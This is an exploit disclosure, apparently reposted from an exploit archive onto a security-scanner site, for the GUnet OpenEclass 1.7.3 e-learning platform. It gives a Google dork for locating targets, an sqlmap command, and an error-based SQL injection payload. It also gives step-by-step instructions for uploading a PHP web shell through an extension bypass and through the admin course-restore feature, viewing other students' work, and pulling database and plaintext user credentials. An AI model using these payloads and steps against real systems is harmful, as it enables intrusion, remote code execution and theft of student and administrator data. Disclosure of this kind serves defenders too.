gunet openeclass 1.7.3 elearning platform month sql injection

▸▸▸ Exploit & Vulnerability >>   webapps exploit & php vulnerability




gunet openeclass 1.7.3 elearning platform month sql injection Code Code...
				
# Exploit Title: GUnet OpenEclass 1.7.3 E-learning platform - 'month' SQL Injection # Google Dork: intext:"© GUnet 2003-2007" # Date: 2020-03-02 # Exploit Author: emaragkos # Vendor Homepage: https://www.openeclass.org/ # Software Link: http://download.openeclass.org/files/1.7/eclass-1.7.3.tar.gz # Version: 1.7.3 (2007) # Tested on: Ubuntu 12 (Apache 2.2.22, PHP 5.3.10, MySQL 5.5.38) # CVE : - Older versions are also vulnerable. Source code: http://download.openeclass.org/files/1.7/eclass-1.7.3.zip http://download.openeclass.org/files/1.7/eclass-1.7.3.tar.gz Setup instructions: http://download.openeclass.org/files/docs/1.7/Install.pdf Changelog: https://download.openeclass.org/files/docs/1.7/CHANGES.txt Manual: https://download.openeclass.org/files/docs/1.7/eClass.pdf ############################################################################ Unauthenticated Information Disclosure System info 127.0.0.1/modules/admin/sysinfo (powered by phpSysInfo 2.0 that is also vulnerable) Web-App version info 127.0.0.1/README.txt 127.0.0.1/info/about.php 127.0.0.1/upgrade/CHANGES.txt ############################################################################ (Authenticated - Requires student account) - Error-Based SQLi https://127.0.0.1/modules/agenda/myagenda.php?month=3&year=2020 sqlmap -u "https://127.0.0.1/modules/agenda/myagenda.php?month=2&year=2020" --batch --dump --- Parameter: month (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: month=5' AND (SELECT 9183 FROM(SELECT COUNT(*),CONCAT(0x7170717671,(SELECT (ELT(9183=9183,1))),0x716b706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Hztw&year=2020' --- Almost every parameter will be either error-based, boolean-based or time-based vulnerable. If you have a student account I recommend using this error-based SQLi because you will get all the database content really faster. If you dont have an account use the following exploit that exploits an unauthenticated time-based blind injection. It will definately be a slower proccess but you will get the administrator account pretty fast and move on with exploiting other authenticated vulnerabilities. https://www.exploit-db.com/exploits/48106 ############################################################################ (Authenticated - Requires student account) - PHP upload file extension bypass If you have a student account you can bypass file extension restrictions and upload a PHP shell. Register as user if the application is configured to allow registrations or use an SQLi to find an account that already exists. Start looking for a class that you can submit an exercise as a student. Register in that class and navigate to submit you exercise. If you try to upload a .php file it will be renamed to .phps to prevent execution. You can upload your PHP shell by spoofing the extension simply by renaming your .php file to .php3 or .PhP Once you have uploaded it, open your course directory and then add "work" directory at the end Course link example: https://127.0.0.1/courses/CS101/ Course link becomes: https://127.0.0.1/courses/CS101/work/ Directory listing will most likely be enabled by default and you will be able to view the directories. Your shell will be in one of the multiple random alphanumeric directories that look like this /4a0c01h2nad9b/ Final shell link will look like this: https://127.0.0.1/courses/CS101/work/4a0c01h2nad9b/shell.php3 The same method works with "groups" if you cant find a class that supports submitting an exercise. https://127.0.0.1/modules/group/group.php ############################################################################ (Authenticated - Requires student account) - View assessments of other students If you have a student account you can view uploaded assessments from other students before or after the deadline that the professor has set. Find the course link you are interested in. https://127.0.0.1/courses/CS101 Add "work" directory at the end https://127.0.0.1/courses/CS101/work/ Directory listing will most likely be enabled by default and you will be able to view and download other students' uploaded assessments. ############################################################################ (Authenticated - Requires admin account) - Upload PHP files You have to login to the platform as an administrator or user with admin rights. You can grab the administrator credentials as plaintext with an Unauthenticated Blind SQL Injection using the following exploit https://www.exploit-db.com/exploits/48106 or use the authenticated SQLi for faster results. Once you have logged in as admin: 1) Navigate to 127.0.0.1/modules/course_info/restore_course.php 2) Upload your .php shell compressed in a .zip file 3) Ignore the error message 4) Your PHP file is now uploaded to 127.0.0.1/cources/tmpUnzipping/[your-shell-name].php ############################################################################ (Authenticated - Requires admin account) - phpMyAdmin Remote Access 127.0.0.1/modules/admin/mysql phpMyAdmin 2.10.0.2 is installed by default and allows remote logins Once you have uploaded your shell can view the config.php file that contains the mysql password 127.0.0.1/config/config.php ############################################################################ (Authenticated - Requires admin account) - Plaintext password storage When logged in as admin you can view all registered users credentials as plaintext. 127.0.0.1/modules/admin/listusers.php

Gunet openeclass 1.7.3 elearning platform month sql injection Vulnerability / Exploit Source : Gunet openeclass 1.7.3 elearning platform month sql injection



Last Vulnerability or Exploits

Developers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Easy integrations and simple setup help you start scanning in just some minutes
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Discover posible vulnerabilities before GO LIVE with your project
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Manage your reports without any restriction

Business Owners

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Obtain a quick overview of your website's security information
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Do an audit to find and close the high risk issues before having a real damage and increase the costs
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Verify if your developers served you a vulnerable project or not before you are paying
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Run periodically scan for vulnerabilities and get info when new issues are present.

Penetration Testers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Quickly checking and discover issues to your clients
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Bypass your network restrictions and scan from our IP for relevant results
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Create credible proved the real risk of vulnerabilities

Everybody

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check If you have an website and want you check the security of site you can use our products
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Scan your website from any device with internet connection

Tusted by
clients

 
  Our Cyber Security Web Test application uses Cookies. By using our Cyber Security Web Test application, you are agree that we will use this information. I Accept.